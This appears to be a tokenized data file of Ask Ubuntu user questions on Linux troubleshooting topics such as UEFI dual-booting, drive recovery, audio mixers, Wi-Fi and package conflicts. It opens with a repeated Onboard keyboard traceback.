in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format
345967	resource monitor for gpu	i 'm looking for a tool similar to top but for your graphics card instead of your cpu . i 've got a nvidia k1000m quadro graphics card but i would prefer something that would work for all ( or most ) cards .
345968	how can i retrieve data using a live cd ?	my hard drive crashed , so i 'm trying to retrieve the data on it using a ubuntu live disk . i can access the desktop , and from there i open `` files '' and try to open `` 1.0 tb volume , '' which ( i think ) is my hard drive . after a good bit of waiting , i receive the message : error mounting /dev/sda1 at /media/ubuntu/282e16d52e169bbe : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/ubuntu/282e16d52e169bbe '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read hiberfil.sys : input/output error failed to mount '/dev/sda1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . i tried successfully made a system repair disk , but it spent about 8 hours `` fixing '' the problem and would have continued had i not shut it off . i do n't really mind waiting , but after 8 hours i doubt it would have done anything . what can i do about this ? please avoid using any words , phrases , or abbreviations that are too technical , as i am not very skilled with computers .
345971	how do i use emerge to install zynaddsubfx presets ?	i found a script on the internet for installing zynaddsubfx presets but when i tried to use it on the command line i was n't able to run it . here is where i get stuck : emerge -s zynaddsubfx . this is what it says : no command 'emerge ' found , did you mean : command 'vmerge ' from package 'util-vserver ' ( universe ) command 'merge ' from package 'rcs ' ( universe ) command 'fmerge ' from package 'fhist ' ( universe ) command 'smerge ' from package 'tstools ' ( universe ) command 'emerge ' not found . can anyone tell me how to use emerge ?
345972	will ubuntu run on a wp8 ?	i recently bought a lumia 521 and was wondering if it would be able to run ubuntu touch . i did not see this question anywhere else , but please tell me if it is .
345974	what is the difference between adduser and useradd ?	what is the difference between the commands adduser and useradd ?
345976	system problem after instalation oracle via yum	recently i tried to install oracle on my ubuntu using fast manual : http : //www.oracle.com/technetwork/articles/servers-storage-admin/ginnydbinstallonlinux-488779.html and after command : sudo yum install oracle-rdbms-server-11gr2-preinstall i got error : failed : ca-certificates.noarch 0:2010.63-3.el6_1.5 chkconfig.x86_64 0:1.3.49.3-2.el6 file-libs.x86_64 0:5.04-15.el6 filesystem.x86_64 0:2.4.30-3.el6 initscripts.x86_64 0:9.03.38-1.0.1.el6_4.2 complete ! and something gone wrong because command like : ps , top are crashing login @ ass-k55vj : /etc/yum/repos.d $ ps -e ps : relocation error : ps : symbol procps_number_version , version _3_2_5 not defined in file libproc-3.2.8.so with link time reference login @ ass-k55vj : /etc/yum/repos.d $ top segmentation fault ( core dumped ) then i tryied to uninstall oracle and dependencies but after command : sudo yum remove oracle-rdbms-server-11gr2-preinstall there was a problem importing one of the python modules required to run yum . the error leading to this problem was : no module named yum please install a package which provides this module , or verify that the module is installed correctly . it 's possible that the above module does n't match the current version of python , which is : 2.6.6 ( r266:84292 , jul 10 2013 , 06:42:56 ) [ gcc 4.4.7 20120313 ( red hat 4.4.7-3 ) ] if you can not solve this problem yourself , please go to the yum faq at : http : //wiki.linux.duke.edu/yumfaq so it seems like yum install in my system new libraries but did n't link it correctly ? i dont know what do in this moment because it seems like armagedon on my ubuntu ...
345977	how can i hook my ubuntu laptop through hdmi into a tv as a second monitor , but only use the speakers on the tv ?	i have a laptop that is hooked up to a very large tv as a second monitor and everything works just perfectly , the problem is i use the tv to play music in the background while i work on my laptop . this is great and all , except the tv is lcd and i 'm worried about burn-in . is there a way to make the part of the desktop on the tv blank so no images burn into it while i 'm on it for a long time ? edit : i guess i 'm not being very clear . i know exactly how to make my tv act as a second monitor and play sound through it , the problem is i ca n't leave it plugged into my tv for long because the image will burn into it . is there any way to have a screensaver of a fullscreen moving image on just one screen to avoid such burn-in ?
345980	unable to burn ubuntu 13.04 in mac	i ca n't burn ubuntu 13.04 iso on a dvd because it has a hybrid boot system and my mac does n't recognize it . is there a way around it ?
345987	problem with infrasonic quartet and alsa	i`ve got infrasonic quartet pci soundcard and use ubuntu 13.04 . the card has 2 analog stereo outputs . i use both outputs to connect my headphones and speakers to each other . but i suddenly can not manage the outputs with alsamixer : i can mute only output 1/2 . output 3/4 is always `` on '' whatever i change in alsamixer . here is my /proc/asound/cards : 0 [ hdmi ] : hda-intel - hda ati hdmi hda ati hdmi at 0xf7e60000 irq 45 1 [ quartet ] : ice1724 - infrasonic quartet infrasonic quartet at 0xc080 , irq 18 can someone tell me how to make alsamixer manage both outputs ? update . here is the amixer -c 1 scontents output : simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 255 mono : playback 249 [ 98 % ] [ 61.00db ] [ on ] simple mixer control 'pcm 1/2',0 capabilities : pvolume cvolume penum playback channels : front left - front right capture channels : front left - front right limits : playback 0 - 255 capture 0 - 164 front left : playback 165 [ 65 % ] [ -3.78db ] capture 155 [ 95 % ] [ 14.00db ] front right : playback 165 [ 65 % ] [ -3.78db ] capture 155 [ 95 % ] [ 14.00db ] simple mixer control 'pcm 3/4',0 capabilities : pvolume cvolume penum playback channels : front left - front right capture channels : front left - front right limits : playback 0 - 255 capture 0 - 164 front left : playback 169 [ 66 % ] [ -3.57db ] capture 155 [ 95 % ] [ 14.00db ] front right : playback 169 [ 66 % ] [ -3.57db ] capture 155 [ 95 % ] [ 14.00db ] simple mixer control 'pcm in 1/2',0 capabilities : cenum items : 'an in 1/2 ' 'an in 3/4' item0 : 'an in 1/2' simple mixer control 'pcm in 3/4',0 capabilities : cenum items : 'an in 3/4 ' 'iec958 in' item0 : 'an in 3/4' simple mixer control 'iec958',0 capabilities : penum items : 'pcm out ' 'h/w in 0 ' 'h/w in 1 ' 'iec958 in l ' 'iec958 in r' item0 : 'pcm out' simple mixer control 'iec958 output',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'iec958',1 capabilities : penum items : 'pcm out ' 'h/w in 0 ' 'h/w in 1 ' 'iec958 in l ' 'iec958 in r' item0 : 'pcm out' simple mixer control 'analog in 1/2',0 capabilities : cenum items : 'line in 1/2 ' 'mic ' 'mic + low-cut' item0 : 'line in 1/2' simple mixer control 'analog in 1/2 to monitor 1/2',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'analog in 1/2 to monitor 3/4',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'analog in 3/4',0 capabilities : cenum items : 'line in 3/4 ' 'hi-z' item0 : 'line in 3/4' simple mixer control 'analog in 3/4 to monitor 1/2',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'analog in 3/4 to monitor 3/4',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'coax output source',0 capabilities : enum items : 'iec958 ' 'i2s' item0 : 'iec958' simple mixer control 'h/w',0 capabilities : penum items : 'pcm out ' 'h/w in 0 ' 'h/w in 1 ' 'iec958 in l ' 'iec958 in r' item0 : 'pcm out' simple mixer control 'h/w',1 capabilities : penum items : 'pcm out ' 'h/w in 0 ' 'h/w in 1 ' 'iec958 in l ' 'iec958 in r' item0 : 'pcm out' simple mixer control 'multi track internal clock',0 capabilities : enum items : '44100 ' '48000 ' '88200 ' '96000 ' '176400 ' '192000 ' 'iec958 in ' 'word clock 1xfs ' 'word clock 256xfs' item0 : '44100' simple mixer control 'multi track rate locking',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'multi track rate reset',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'output 1/2 to monitor 3/4',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'output 3/4 to monitor 1/2',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'phantom power',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] could anybody explain what this output means ? why playback channels are mono ? here is my alsamixer screenshot : output 3/4 is off but both outputs are playing sound now . and i can`t switch it off .
345990	i ca n't install ubuntu	i have a toshiba satellite l305d-sp6805r , it comes with an ati radeon hd 3100 graphics card , an amd athlon x2 64-bits processor . and when i tried to install ubuntu 12.04 but sudendly it turns off before finishing installation . i think that the fans are not really working in the installation process . i tried using cd , and usb in the installation . i 'll be glad for your help .
345996	please help an idiot defeat uefi	short version : i am clueless about this uefi guff and am looking someone to tell me where i 'm going wrong loooong version ... i just bought a new laptop , windows 8 ( not by choice ) , uefi secure boot ( also not by choice ) . i have followed what feels like a million tutorials and can not dual boot this at all and i 'm losing the plot . 2 1tb hard drives . it came with windows 8 + bloatware taking up a whopping 70 ish gb of the first drfive and the second drive empty . so i downloaded the ubuntu 13.04 64bit iso and burned to dvd . after a serious fight with secure boot it allowed me to run live 'try ubuntu ... ' . ran through the install wizard with the intension of dual booting the first drive windows/ubuntu and leaving the second drive for storage . the install wizard would n't see windows 8 ( didnt detect any other oses ) . so after multiople tutorials faiuled to get the wizard to see windows , i decided to just try putting ubuntu on the second disk . used the 'something else.. ' option to set up a /boot , / , /home and swap , installed then rebooted : computer booted straight to windows 8 , so i figured its booting off disk one , changed bios to boot from disk two : black screen with failed to boot over and over . next , found guide on here for using boot-repair : followed it and now i ca n't get either windows or linux to boot - one says efi failed the other just 'boot failed ' . btw - i 'm not blaming the guide or this site , i am a noob at this . can anyone help me dual boot in some shape or form please ? i 'm only keeping the windows partition for gaming , otherwise it would be wiped already . ps : heres a link boot repair generated if it helps - http : //pastebin.ubuntu.com/6112251/
345998	where is the redis log file ?	i do not have redis_6379.log file . according to documentation , that one has to be added manually , but i did find a redis log file on ubuntu server in this location : /var/log/redis/redis-server.log however , i checked its contents and it seems to be logging for the redis-server itself , and not for the logging of the publish-subscribe messaging to the redis server from redis clients . for example , i have one redis client that publishes notifications and another redis client that subscribes to those notifications . so when i run redis-cli monitor utility , i see some of the notifications : 1379280701.041227 `` publish '' `` juggernaut '' `` { \ '' channels\ '' : [ \ '' /alerts/6706/new\ '' ] , \ '' data\ '' : \ '' new alerts for unit 6706\ '' } '' 1379280701.042079 `` publish '' `` juggernaut '' `` { \ '' channels\ '' : [ \ '' /reports/6706/new\ '' ] , \ '' data\ '' : \ '' new reports for unit 6706\ '' } '' however , like any log file , i want to query against it with grep , tail , head , etc commands to find information on specific dates . does such a log file exist in redis ? or must i add these messages to my own custom log files from within the client applications themselves ?
346003	i ca n't use my ubuntu software center ?	i am using ubuntu 11.10 version .. when i try to open the ubuntu software center it opens but gives me a blank screen and nothing shows up , before this happens it used to open normally but i could n't install or upgrade anything from it as an error used to pop up that i have to remove something and it also refused to remove it ! so please i need a solution for this .
346004	customizing scopes/lenses ?	in the video scopes it shows 2 of my movies in my ~/videos/movies ( /media/videos/movies ) folder . when i have some 20 movies in there . the scope wont show my tv shows either under ~/videos/tv_shows/ . i want it to show up with as in the scopes where it says `` my videos '' as `` movies '' and a second one under that as `` tv shows '' setup as seasons where you click on a season and it shows all the episodes . how do i go about doing this ?
346009	how to remove the mate terminal icon from the dash home ?	i uninstalled mate , but the terminal is still in dash home . i click on it , and nothing opens . is there any way i can remove it ?
346011	how to rename multiple photos and videos based on exif data ?	i often import photos and videos ( mostly having jpg and mov extensions ) from digital cameras and tablets to my pc , and i would ideally like to see them sorted according to the dates and times they were taken already present in their exif data . and hence my wish to rename them all preferably using a simple nautilus script by preferably inserting the date and time stamps before each filename . i have so far managed only to bring together the following nautilus script , which i believe is far from perfect : for i in * . * do mv -i `` $ i '' `` $ ( exiftool -createdate `` $ i '' | awk -f ' : ' ' { print $ 2 } ' ) _ '' $ i '' '' done what i do n't like in this renaming method is the colons used in exif date and time stamps ( e.g . `` 2013:09:03 20:55:09_img_0108.jpg '' ) which might create problems when transferring these files later to other environments ( e.g . windows ) . this command ( using exiv2 instead of exiftool ) conveniently enables manipulation of date and time stamps but its drawback is that it does n't work on video ( e.g . mov ) files : exiv2 -k -r ' % y- % m- % d_ % h- % m- % s_ : basename : ' rename `` $ i '' so i 'm hoping someone can come up with a better solution . and it would be magic if it even managed to convert the original filenames and extensions to lowercase as well !
346012	ubuntu wo n't install properly	ok. so heres the story . once , i had windows 7. i hated it , so i borrowed a drive and got ubuntu 13.04. later i found out about the 13.10 alpha saucy salamander update and i got that too . after a week i got bored and installed fedora . it crashed soon . so i borrowed a drive again and go ubuntu . after a month i had only 3 gb left of my 60 gb . this was the bad part . i was stupid enough to actually get meego . then , i found out i ca n't get wifi . then i borrowed a drive again , and tried to install ubuntu . just as usual , i pressed f12 and it allowed me to chose the drive . then it booted up like normal and then i was asked to try or install ubuntu . i clicked install ubuntu . then i had to chose whether to replace meego with ubuntu or somthing else . i replaced meego . .it said '0 mb of disk space left ' . it stopped in the middle of installation . now i 'm stuck with no os . when i try to install ubuntu , the same bloody '0 mb of disk space left ' pops up and stops in the middle of the download . i have no experience in this area . do i need to do something with a partition ? plz help me before tommorow . it is a work day ! ! ! ! ! ! ! ! have thinkpad lenovo x201 . help me get ubuntu ! ! ! ! ! !
346014	keyboard is redirecting my requests in typing basic characters	my key board was working fine this morning , but for some reason the following characters appear as : key pressed : result , e : e3 , h : h7 , g : g4 , 1 : blank , - : -p , backspace : print screen , and backs-pace : 3 th7is is g4e3tting4 -pre3tty annoying4 and i 'm not e3xactly sure3 h7ow to fix it . i 've checked my keyboard settings and everything seems normal . anyth7ing4 h7e3l-ps , th7anks~
346016	boot failure from usb flash drive after changed boot order	i have live ubuntu 12.04 desktop on a usb flash drive . i 've gone into my bios and changed the boot order so that it runs external drives first . on startup , when the flash is in , it will start to boot it . but , it does n't do anything but give this message : syslinux 4.06 edd 2012-10-23 copyright ( c ) 1994-2012 h. peter anvin et al_ the underscore just flashes . i do n't know what to do from here . i 've attempted every key and each key combination i can think of . it does n't appear to respond to keys at all . the flash drive is formatted in fat32 , by the way . i used universal usb installer to put it on there .
346017	laptop keeps disconnecting from wi-fi	i have a hp pavilion sleekbook and i just put ubuntu on it . i enjoy it , but my wifi keeps disconnecting itself whenever i am downloading anything bigger than 1gb . please help ! this is very frustrating and making me regret getting rid of windows . if i ca n't resolve this i 'm going to have to figure out a way to go back to windows .
346019	how to create live usb from a running ubuntu installation	i installed ubuntu and did some customisations ( actually , it 's on a vm running inside virtualbox , however this might not be relevant ) . now i wonder , whether it would be possible to create a live usb drive with all the customisations that i put in place . what i care about is that when someone actually uses the live usb to install ubuntu , he would then get all the changes that i made . changes involve : downloading some git repos from the web , installing a few packages , changing their configuration , e.g . configuring a tomcat web server . i came accross uck ( ubuntu customisation kit ) . it seems it could help me do what i want however it 's not ideal . it allows to customise the installation from a console . unfortunately , there is no way to test things like a webserver installation . also - in case i screwed something up - i have to redo all the work all over again . questions : is there a way to create a live usb from a running ubuntu installation ? is there a way to avoid redoing all the work every time i run ubuntu customisation kit ? thank you so much .
346021	after installing ubuntu , ca n't start windows	after a difficult installation of ubuntu on a win 8 asus n56v , now i only can get ubuntu running ... on starting computer i get different options including some win 8 ( eg on sda2 ) . i tried boot repair but didnt work . after choosing win8 i get message : `` cant find command drive map '' and `` invalid efi file path '' . more info : http : //paste.ubuntu.com/6112607 and here : http : //paste.ubuntu.com/6114637 thanks , yoeri
346026	boot vhd with grub2 and ubuntu 13.04	is it possible to add an option to boot a vhd with windows 8 installed with grub2 on ubuntu 13.04 ? kr , paul
346029	applications and volume level bug/glitch	i have an hp dv4 laptop running ubuntu 13.04 , that has a weird bug when i play some games on it . so when i go into the game , the volume will just go crazy , going up and down , and does not stop . i 'm not sure what else to say , but i 'm more than happy to provide anything helpful..
346032	ca n't install bitcoind in upgraded system due package conflicts	i was previously using ubuntu 10.04 and i tried to install bitcoind . this failed and i upgraded to ubuntu 12.04 . when i run bitcoind it still does n't work : $ bitcoind ************************ exception : 11dbexception db : :open : invalid argument bitcoin in appinit ( ) terminate called after throwing an instance of 'dbexception' what ( ) : db : :open : invalid argument aborted ( core dumped ) also , trying to re-install does not work : $ sudo apt-get install bitcoind reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : bitcoind 0 upgraded , 1 newly installed , 0 to remove and 1 not upgraded . need to get 981 kb of archives . after this operation , 2,873 kb of additional disk space will be used . get:1 http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu/ precise/main bitcoind amd64 0.8.5-precise1 [ 981 kb ] fetched 981 kb in 7s ( 130 kb/s ) ( reading database ... 222704 files and directories currently installed . ) unpacking bitcoind ( from ... /bitcoind_0.8.5-precise1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/bitcoind_0.8.5-precise1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/bitcoind ' , which is also in package bitcoin 0.3.24-ppa2~lucid no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/bitcoind_0.8.5-precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i get bitcoind working ? i do n't mind un-installing and re-installing if that is what it takes . update 1 i just tried removing the package and installing again , but still no luck : $ sudo apt-get remove -- purge bitcoind reading package lists ... done building dependency tree reading state information ... done package bitcoind is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . $ sudo apt-get install bitcoind reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : bitcoind 0 upgraded , 1 newly installed , 0 to remove and 1 not upgraded . need to get 981 kb of archives . after this operation , 2,873 kb of additional disk space will be used . get:1 http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu/ precise/main bitcoind amd64 0.8.5-precise1 [ 981 kb ] fetched 981 kb in 7s ( 136 kb/s ) ( reading database ... 222704 files and directories currently installed . ) unpacking bitcoind ( from ... /bitcoind_0.8.5-precise1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/bitcoind_0.8.5-precise1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/bitcoind ' , which is also in package bitcoin 0.3.24-ppa2~lucid dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/bitcoind_0.8.5-precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
346033	renaming a directory ?	i have a directory i want to rename without spaces . this is the path to the file with spaces /home/ebank36/minecraft/the fall of gondolin . i want to rename that directory to tfog so i would like it to look like /home/ebank36/minecraft/tfog . i need to do this so i can move a file out of that directory and place it in /home/ebank36/minecraft .
346037	audio for remote desk-top	i need to look in on what my second grader is watching on youtube . vinagre works ok ( i know george orwell would be proud ) , except i am not getting audio . i am much more interested in getting him to learn to self edit than trying to block everything . i know he is more compliant when someone is might be monitoring . the big problem is harmless looking video that is wall to wall inappropriate language . i need to be able to check the audio too . what are my options for audio support ?
346042	hdmi displaying on tv but not displaying correctly . fixes ?	i 'm running ubuntu 12.04 . this is the strangest problem ever and i have no idea how to describe it , but i 'll try . i got the audio working with the hdmi , and then it shows my ubuntu desktop on the tv screen but does not show any programs i have open ? it sometimes shows my mouse , but only if it 's on the sidebar , and only sometimes.. weird right ? anyone know what 's going on ?
346046	how can i play media/video files via upnp/dlna from command line ( dmc/dmp )	i am looking for something like gupnp-av-cp ( or any other upnp capable program/player/conntroller ) , but from the command line . i would like to pass it a renderer and the uri of the file/resource . it would be nice if it could handle local file resources ( probably by starting up a temporary server ? ! ) using vlc would be nice , but it does not appear to support via command line arguments , does it ?
346048	does a maas region or cluster controller going down mean the provisioned servers go down or only that new servers will not be provisioned ?	this is a followup question to my previous question . i 'm trying to understand the implications if a region or cluster controller goes down . so , does a maas region or cluster controller going down mean the provisioned servers go down or only that new servers will not be provisioned ?
346049	how to use a vpn which was created on ubuntu machine ?	i followed these instructions : http : //askubuntu.com/a/305401 how can i connect to my vpn server ? what 's the ip address i need to connect to ? i want to do that from my mobile phone . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # $ id $ # # sample poptop configuration file /etc/pptpd.conf # # changes are effective when pptpd is restarted . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # tag : ppp # path to the pppd program , default '/usr/sbin/pppd ' on linux # # ppp /usr/sbin/pppd # tag : option # specifies the location of the ppp options file . # by default ppp looks in '/etc/ppp/options' # option /etc/ppp/pptpd-options # tag : debug # turns on ( more ) debugging to syslog # # debug # tag : stimeout # specifies timeout ( in seconds ) on starting ctrl connection # # stimeout 10 # tag : noipparam # suppress the passing of the client 's ip address to ppp , which is # done by default otherwise . # # noipparam # tag : logwtmp # use wtmp ( 5 ) to record client connections and disconnections . # logwtmp # tag : bcrelay < if > # turns on broadcast relay to clients from interface < if > # # bcrelay eth1 # tag : localip # tag : remoteip # specifies the local and remote ip address ranges . # # any addresses work as long as the local machine takes care of the # routing . but if you want to use ms-windows networking , you should # use ip addresses out of the lan address space and use the proxyarp # option in the pppd options file , or run bcrelay . # # you can specify single ip addresses seperated by commas or you can # specify ranges , or both . for example : # # 192.168.0.234,192.168.0.245-249,192.168.0.254 # # important restrictions : # # 1 . no spaces are permitted between commas or within addresses . # # 2 . if you give more ip addresses than max_connections , it will # start at the beginning of the list and go until it gets # max_connections ips . others will be ignored . # # 3 . no shortcuts in ranges ! ie . 234-8 does not mean 234 to 238 , # you must type 234-238 if you mean this . # # 4 . if you give a single localip , that 's ok - all local ips will # be set to the given one . you must still give at least one remote # ip for each simultaneous client . # # ( recommended ) # localip 192.168.0.1 # remoteip 192.168.0.234-238,192.168.0.245 # or # localip 192.168.0.234-238,192.168.0.245 # remoteip 192.168.1.234-238,192.168.1.245 localip 10.99.99.99 remoteip 10.99.99.100-199 ifconfig : eth1 link encap : ethernet hwaddr 1c:15:2d : d1 : ce : a6 inet addr:192.168.1.121 bcast:192.168.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:3783462 errors:108 dropped:0 overruns:0 frame:5067689 tx packets:2485445 errors:14 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:423273032 ( 423.2 mb ) tx bytes:413521637 ( 413.5 mb ) interrupt:17
346054	really weird issue with wifi on ubuntu 13.04	i have a dell xps laptop with ubuntu 13.04 ; it 's a recent install , about two or three weeks old , and i 'm having trouble connecting to my college campus ' wifi . since about a week ago , i 've been getting problems where it connects to a network , but when i try to navigate to any webpage , it gives me an error `` name resolution failed '' . this was apparently at random ; some of the time , the pages would load fine . since yesterday , when i try to connect to any network , i get the message `` connected : ( none ) '' . now , this is weird ; sometimes i can get to pages on this 'network ' , and sometimes i get the same error as the other times . again , appears completely random . using an ethernet cable gives absolutely no problems at all . what the heck is happening ? and how do i fix it ?
346059	cli based file manager that shows tree-like directory extructure	if you have the program `` tree '' installed on your system and you happen to run this the command tree in your system , the result is something like this : ├── a ├── b └── c ├── a ├── b └── c 6 directories , 0 files i am looking for a file manager that works exactly like this , but i need to be able to use my mouse with it , just like a regular gui file manager . is there such program in existence ? i want to click on the file names , folder names , rather than an icon of a folder or a file .
346061	gnome3 - missing indicators : printer and keyboard layouts	i 'm using gnome 3.8 and i have two most annoying issues : i do n't have an indicator for printers ( so i ca n't quickly manage printer jobs ) . also , i do n't have an indicator for changing the layout of my keyboard .
